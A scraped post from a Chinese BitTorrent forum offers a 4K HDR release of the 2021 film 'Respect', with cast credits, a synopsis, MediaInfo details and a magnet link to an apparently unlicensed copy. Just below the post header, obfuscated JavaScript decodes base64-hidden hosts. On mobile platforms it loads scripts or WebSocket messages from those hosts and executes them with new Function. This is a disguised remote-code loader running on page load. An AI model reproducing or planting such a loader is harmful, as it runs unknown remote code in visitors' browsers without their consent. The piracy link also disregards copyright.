尊重.Respect.2021.2160p.WEB-DL.x265.10bit.HDR.DDP5.1.x265 25.68GB

版主小s 1月前 334

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 尊重 / 灵魂心声(台)
◎片  名 Respect
◎年  代 2021
◎产  地 美国
◎类  别 剧情 / 音乐 / 传记
◎语  言 英语
◎上映日期 2021-08-13(美国)
◎IMDb链接 https://www.imdb.com/title/tt2452150/
◎豆瓣链接 https://movie.douban.com/subject/30133744/
◎片  长 145分钟
◎导  演 丽莎·汤米 Liesl Tommy (id:1390944)
◎编  剧 特雷西·斯科特·威尔逊 Tracey Scott Wilson (id:1386740)
       卡莉·克里 Callie Khouri (id:1036971)
◎演  员 詹妮弗·哈德森 Jennifer Hudson (id:1049673)
       福里斯特·惠特克 Forest Whitaker (id:1053567)
       奥德拉·麦克唐纳 Audra McDonald (id:1009457)
       西康·塞布罗 Saycon Sengbloh (id:1143699)
       海莉·基尔戈尔 Hailey Kilgore (id:1460807)
       布兰达·妮科尔·穆勒 Brenda Nicole Moorer (id:1460808)
       马龙·韦恩斯 Marlon Wayans (id:1025205)
       马克·马龙 Marc Maron (id:1116943)
       泰塔斯·伯吉斯 Tituss Burgess (id:1348723)
       金伯利·斯科特 Kimberly Scott (id:1140191)
       勒罗伊·麦克莱恩 Leroy McClain (id:1428243)
       泰特·多诺万 Tate Donovan (id:1027848)
       阿尔伯特·琼斯 Albert Jones (id:1341741)
       博·谢尔 Beau Scheier (id:1460809)
       迈克·沃特福德 Myk Watford (id:1163748)
       玛丽·布莱姬 Mary J. Blige (id:1014134)
       希瑟·海德利 Heather Headley (id:1028337)
       约书亚·米克尔 Joshua Mikel (id:1355629)
       扎克·斯特鲁姆 Zach Strum (id:1448394)
       乔·奈泽维奇 Joe Knezevich (id:1243802)
       肖恩·雷卡特尔 Shawn Ray Cartel (id:1443043)
       布兰登·吉尔平 Brandon Gilpin (id:1440761)
       施奎塔·詹姆斯 Shiquita James (id:1423082)
       莫里斯·约翰逊 Maurice Johnson (id:1377684)
       桃乐丝·麦卡锡 Doris McCarthy (id:1388388)
       维多利亚·佩吉·沃特金斯 Victoria Paige Watkins (id:1434123)
        Lodric D. Collins (id:1255632)
        Demetrius B. Banks (id:1260774)
        Melissa Lowe (id:1259522)
       Rege Lewis Rege Lewis (id:1206684)

◎标  签 传记 / 音乐 / 美国 / 剧情 / 2021 / 詹妮弗·哈德森 / 欧美 / 海报

◎简  介
  聚焦弗兰克林的崛起,她如何从在父亲的唱诗班开始歌唱的女孩,成为美国音乐史上极为重要的灵魂歌后。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 218342625890845064695693997715564204831 (0xA44342982329C7D111C3326F249F131F)

  4. Complete name                            : Respect.2021.2160p.WEB-DL.x265.10bit.HDR.DDP5.1.x265-NOGRP.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 25.7 GiB

  8. Duration                                 : 2 h 24 min

  9. Overall bit rate                         : 25.4 Mb/s

  10. Encoded date                             : UTC 2021-08-27 05:44:38

  11. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@High

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 2 h 24 min

  21. Bit rate                                 : 24.7 Mb/s

  22. Width                                    : 3 840 pixels

  23. Height                                   : 1 594 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0 (Type 2)

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.169

  31. Stream size                              : 25.0 GiB (97%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : BT.2020

  39. Mastering display luminance              : min: 0.0050 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level              : 1614 cd/m2

  41. Maximum Frame-Average Light Level        : 1005 cd/m2


  42. Audio

  43. ID                                       : 2

  44. Format                                   : E-AC-3

  45. Format/Info                              : Enhanced AC-3

  46. Commercial name                          : Dolby Digital Plus

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 2 h 24 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 640 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 663 MiB (3%)

  57. Language                                 : English

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Text #1

  62. ID                                       : 3

  63. Format                                   : UTF-8

  64. Codec ID                                 : S_TEXT/UTF8

  65. Codec ID/Info                            : UTF-8 Plain Text

  66. Duration                                 : 2 h 23 min

  67. Bit rate                                 : 45 b/s

  68. Count of elements                        : 1943

  69. Stream size                              : 47.5 KiB (0%)

  70. Title                                    : English

  71. Language                                 : English

  72. Default                                  : Yes

  73. Forced                                   : No


  74. Text #2

  75. ID                                       : 4

  76. Format                                   : UTF-8

  77. Codec ID                                 : S_TEXT/UTF8

  78. Codec ID/Info                            : UTF-8 Plain Text

  79. Duration                                 : 2 h 24 min

  80. Bit rate                                 : 73 b/s

  81. Count of elements                        : 2549

  82. Stream size                              : 77.9 KiB (0%)

  83. Title                                    : English [SDH]

  84. Language                                 : English

  85. Default                                  : No

  86. Forced                                   : No


  87. Text #3

  88. ID                                       : 5

  89. Format                                   : UTF-8

  90. Codec ID                                 : S_TEXT/UTF8

  91. Codec ID/Info                            : UTF-8 Plain Text

  92. Duration                                 : 2 h 23 min

  93. Bit rate                                 : 38 b/s

  94. Count of elements                        : 1537

  95. Stream size                              : 40.8 KiB (0%)

  96. Title                                    : French

  97. Language                                 : French

  98. Default                                  : No

  99. Forced                                   : No


  100. Text #4

  101. ID                                       : 6

  102. Format                                   : UTF-8

  103. Codec ID                                 : S_TEXT/UTF8

  104. Codec ID/Info                            : UTF-8 Plain Text

  105. Duration                                 : 2 h 17 min

  106. Bit rate                                 : 44 b/s

  107. Count of elements                        : 1581

  108. Stream size                              : 44.5 KiB (0%)

  109. Title                                    : Spanish

  110. Language                                 : Spanish

  111. Default                                  : No

  112. Forced                                   : No



TAGS 剧情 传记 音乐

磁力链:
  • magnet:?xt=urn:btih:7DFC709517DC9CC3EF2C153CE29A7F71C56F8190
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回